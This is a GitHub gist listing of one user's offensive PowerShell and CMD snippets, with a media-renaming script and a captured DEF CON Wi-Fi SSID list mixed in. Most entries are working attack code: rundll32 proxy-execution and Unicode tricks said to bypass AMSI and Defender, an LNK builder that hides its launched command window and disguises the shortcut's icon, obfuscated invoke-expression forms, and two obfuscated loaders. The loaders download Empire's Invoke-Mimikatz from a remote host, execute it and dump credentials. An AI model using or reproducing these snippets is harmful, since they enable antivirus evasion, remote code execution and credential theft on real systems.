Bobby-Tablez bobby-tablez
@bobby-tablez
bobby-tablez / proxy_execution_bypass_T1218.txt
Created February 25, 2024 00:37
Proxy Execution Using Rundll32.exe Vbscript
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.
# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
@bobby-tablez
bobby-tablez / lnk_builder.ps1
Last active January 24, 2024 14:35
PowerShell Shortcut LNK Builder
# Set IconLocation to app or dll to change its appearance https://www.digitalcitizen.life/where-find-most-windows-10s-native-icons/
$LinkStart = New-Object -comObject WScript.Shell;
$lnk = $LinkStart.CreateShortcut("$env:USERPROFILE\Desktop\my_new_shortcut.lnk");
$lnk.IconLocation = "$env:WINDIR\System32\notepad.exe";
$lnk.TargetPath = "cmd.exe"
$lnk.WindowStyle = 7; # 7 = minimized (WshShortcut has no fully hidden style)
$lnk.Arguments = '/c calc.exe';
$lnk.Save() | Out-Null;
@bobby-tablez
bobby-tablez / rename-media.ps1
Created January 5, 2024 03:20
Batch Rename and Format Media Files
<#
Batch rename "downloaded" media files to make the file names more appealing.
Supply a directory to be scanned recursively: "rename-media.ps1 C:\path\to\media"
IE: "the.sum.of.all.fears.2002.1080p.BLAH.Text.Atmos.COOLPEOPLE.mkv" to "The Sum Of All Fears (2002).mkv"
#>
Param (
[string]$Path
)
@bobby-tablez
bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echoes a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever they want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
#
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
@bobby-tablez
bobby-tablez / DC31_Wifi_SSIDs.txt
Created September 8, 2023 16:33
DEF CON 31 WIFI Networks
# This list contains all SSIDs I observed during defcon 31. Includes registration, walking around the con. Captured using a Pineapple MK7
!!
#ATTHEMOXY
#Free Simon Wi-Fi
*WIFI-AIRPORT
.WynnEncoreGuest
.YUL Wi-Fi
01-STATION-INN
07edba9d8f623dc6f4d86eccf53d1280
@bobby-tablez
bobby-tablez / av_bypass_invoke_mimikatz
Last active December 23, 2022 03:23
Invoke Mimikatz - Such obfuscation, many hide, so AMSI bypass
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;@(2135,2147,2147,2143,2146,2089,2078,2078,2145,2128,2150,2077,2134,2136,2147,2135,2148,2129,2148,2146,2132,2145,2130,2142,2141,2147,2132,2141,2147,2077,2130,2142,2140,2078,2097,2098,2076,2114,2100,2098,2116,2113,2104,2115,2120,2078,2100,2140,2143,2136,2145,2132,2078,2140,2128,2136,2141,2078,2132,2140,2143,2136,2145,2132,2078,2146,2132,2145,2149,2132,2145,2078,2131,2128,2147,2128,2078,2140,2142,2131,2148,2139,2132,2126,2146,2142,2148,2145,2130,2132,2078,2130,2145,2132,2131,2132,2141,2147,2136,2128,2139,2146,2078,2104,2141,2149,2142,2138,2132,2076,2108,2136,2140,2136,2138,2128,2147,2153,2077,2143,2146,2080)|%{$sr=$sr+[char]($_-2031)};$cue='rl';$fis = Get-Random 483;.(gal n?[?al]) $fis cu$cue;.(&(&(gal g?l) g?[?l]) ?e[?x])(& $fis -useb $sr);&("{0}{3}{4}{2}{1}" -f 'In','z','ikat','voke-','Mim') -DumpCreds
@bobby-tablez
bobby-tablez / IEX_Obfuscated.ps1
Created September 28, 2022 16:30
A list of obscure obfuscated PowerShell invoke expressions
# use at your own risk
$sk="xjeji";$sl=($sk[4,2,0]-Join"");.($sl)
.((RVpa "\???????\\*2\*POO*\\*river?\?6*").PATh[4,15,34]-JOin'')
.(g`cm ?e[?x])
.(ga`l i?[?x])
@bobby-tablez
bobby-tablez / Obfuscated Invoke Mimikatz
Last active September 21, 2022 01:39
Pulls from Empire's Invoke-Mimikatz.ps1
# Use at your own risk!
#
# ORIGINAL:
# IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#
[STrING]::joIn('' , ( [cHar[]]( 18, 30 ,3 , 123 , 115, 21 ,62 , 44 , 118,20 , 57,49 ,62, 56 , 47 , 123 ,21,62, 47 , 117 , 12, 62, 57,24,55 ,50,62, 53 , 47 ,114,117, 31,52 ,44, 53, 55,52, 58, 63, 8 ,47 ,41 , 50, 53, 60, 115 , 121 , 51 , 47 , 47 ,43 , 40 ,97,116, 116, 41, 58 ,44, 117 ,60 , 50 , 47 ,51 , 46 ,57,46 ,40, 62 ,41 , 56, 52 , 53,47 ,62, 53, 47, 117,56, 52,54 , 116 , 25,24 ,118 ,8,30,24 , 14 , 9 ,18 ,15 ,2, 116,30, 54 ,43 , 50 ,41, 62 ,116 ,54, 58 , 40 , 47 , 62 ,41, 116, 62 , 54, 43 , 50 , 41 , 62, 116 ,40 , 62, 41, 45, 62,41 , 116 ,63 ,58,47 ,58 ,116,54,52 , 63 , 46,55,62, 4 , 40 , 52 , 46, 41 , 56,62 ,116,56,41 , 62 ,63 , 62,53 , 47 ,50, 58,55 , 40, 116 ,18 , 53 ,45 , 52, 48 ,62 ,118,22 ,50, 54, 50 , 48 ,58, 47,33,